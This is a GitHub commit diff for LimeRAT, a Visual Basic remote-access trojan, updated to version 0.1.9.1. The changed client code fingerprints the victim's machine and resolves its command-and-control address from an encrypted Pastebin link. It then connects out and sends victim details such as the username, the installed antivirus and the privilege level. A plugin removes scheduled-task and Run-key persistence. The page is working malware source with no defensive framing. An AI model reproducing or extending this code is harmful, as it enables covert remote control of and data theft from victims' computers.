Skip to content
This repository was archived by the owner on Jun 25, 2019. It is now read-only.

Commit 7251721

Browse files
committed
Update v0.1.9.1
Bugs fixed.
1 parent 8287f22 commit 7251721

File tree

25 files changed

+161
-169
lines changed

25 files changed

+161
-169
lines changed

.vs/LimeRAT/v15/.suo

-2.5 KB
Binary file not shown.
552 KB
Binary file not shown.
0 Bytes
Binary file not shown.
56.3 KB
Binary file not shown.

Project/Client/C_Commands.vb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66

77
Public Shared Sub Data(ByVal b As Byte())
88
Try : C_TcpClient.Send("OK" + SPL + C_ID.HWID + SPL + C_ID.UserName) : Catch : End Try
9-
Threading.Thread.Sleep(50)
9+
1010
Dim EN As String = C_Encryption.AES_Decrypt(BS(b))
1111
Dim A As String() = Split(EN, SPL)
1212

Project/Client/C_ID.vb

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -50,7 +50,6 @@
5050

5151
Public Shared Function HWID() As String 'http://www.codeproject.com/Articles/28678/Generating-Unique-Key-Finger-Print-for-a-Computer
5252
Try
53-
' Return IO.Path.GetRandomFileName
5453
Dim tohash As String = Identifier("Win32_Processor", "ProcessorId")
5554
tohash += "-" & Identifier("Win32_BIOS", "SerialNumber")
5655
tohash += "-" & Identifier("Win32_BaseBoard", "SerialNumber")

Project/Client/C_Main.vb

Lines changed: 1 addition & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,5 @@
11
'##################################################################
2-
<<<<<<< HEAD
32
'## N Y A N C A T ||| Updated on Nov./27/2018 ##
4-
=======
5-
'## N Y A N C A T ||| Updated on Sept/25/2018 ##
6-
>>>>>>> parent of 19710ea... UPDATE v0.1.8.5C
73
'##################################################################
84
'## ##
95
'## ##
@@ -60,7 +56,7 @@ Namespace Lime
6056
Dim createdNew As Boolean = False
6157
C_Settings.MTX = New Threading.Mutex(True, C_ID.HWID, createdNew)
6258
If Not createdNew Then
63-
End
59+
End
6460
End If
6561

6662
If C_Settings.ANTI Then

Project/Client/C_TcpClient.vb

Lines changed: 10 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
1-
Namespace Lime
1+
Imports System.Collections.Generic
2+
3+
Namespace Lime
24

35
Public Class C_TcpClient
46
Public Shared ENDOF As String = C_Settings.ENDOF
@@ -8,14 +10,9 @@
810
Public Shared T1 As New Threading.Thread(AddressOf Connect)
911
Public Shared isConnected As Boolean = False
1012
Public Shared MS As IO.MemoryStream = Nothing
11-
<<<<<<< HEAD
1213
Public Shared Tick As Threading.Timer = Nothing
1314
Public Shared x As Integer = 0
1415
Public Shared P As New List(Of Integer)
15-
=======
16-
Public Shared Tick As System.Threading.Timer = Nothing
17-
Public Shared KA As Integer = 0
18-
>>>>>>> parent of 19710ea... UPDATE v0.1.8.5C
1916

2017
Public Shared Sub Connect()
2118

@@ -92,31 +89,31 @@ re:
9289
C_Settings.HOST = "127.0.0.1"
9390
C_Settings.PORT = 8989
9491
#Else
92+
9593
Using WC As New Net.WebClient 'Pastebin, split by ":" IP:PORT
9694
Try
9795
Dim myCredentials As New Net.NetworkCredential("", "")
9896
WC.Credentials = myCredentials
9997
Dim Response As String = WC.DownloadString(C_Encryption.AES_Decrypt(C_Settings.Pastebin))
100-
C_Settings.HOST = Response.Split(":")(0)
101-
C_Settings.PORT = Response.Split(":")(1)
98+
' Dim Response As String = WC.DownloadString((C_Settings.Pastebin))
99+
Dim SPL = Split(Response, ":")
100+
C_Settings.HOST = SPL(0)
101+
Dim r As New Random
102+
C_Settings.PORT = SPL(New Random().Next(1, SPL.Length))
102103
WC.Dispose()
103104
Catch ex As Exception
104105
End Try
105106
End Using
106107

107108
#End If
109+
108110
C.Connect(C_Settings.HOST, C_Settings.PORT)
109111
isConnected = True
110112
MS = New IO.MemoryStream
111113

112-
<<<<<<< HEAD
113114
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.9.1", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
114115
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL,
115116
C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
116-
=======
117-
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
118-
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
119-
>>>>>>> parent of 19710ea... UPDATE v0.1.8.5C
120117
C_ID.Privileges.ToString, SPL, C_Settings.fullpath))
121118

122119
Dim T As New Threading.TimerCallback(AddressOf PING)
@@ -153,7 +150,6 @@ re:
153150
Public Shared KAP As Integer = 0
154151
Public Shared Sub PING()
155152
Try
156-
Threading.Thread.Sleep(1)
157153
If P_Start Then i += 1
158154

159155
If P_Stop Then
0 Bytes
Binary file not shown.

Project/Plugins/PCL/Main.vb

Lines changed: 1 addition & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -63,11 +63,8 @@
6363
Try : Shell("schtasks /Delete /tn LimeRAT-Admin /F", AppWinStyle.Hide, False, -1) : Catch : End Try
6464
Try : Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(EXE) : Catch : End Try
6565
End If
66-
Try
67-
Microsoft.Win32.Registry.CurrentUser.DeleteSubKeyTree("Software\" & HWID)
68-
Catch ex As Exception
69-
End Try
7066

67+
Microsoft.Win32.Registry.CurrentUser.DeleteSubKeyTree("Software\" & HWID)
7168
CriticalProcesses_Disable()
7269
Threading.Thread.Sleep(50)
7370

0 commit comments

Comments
 (0)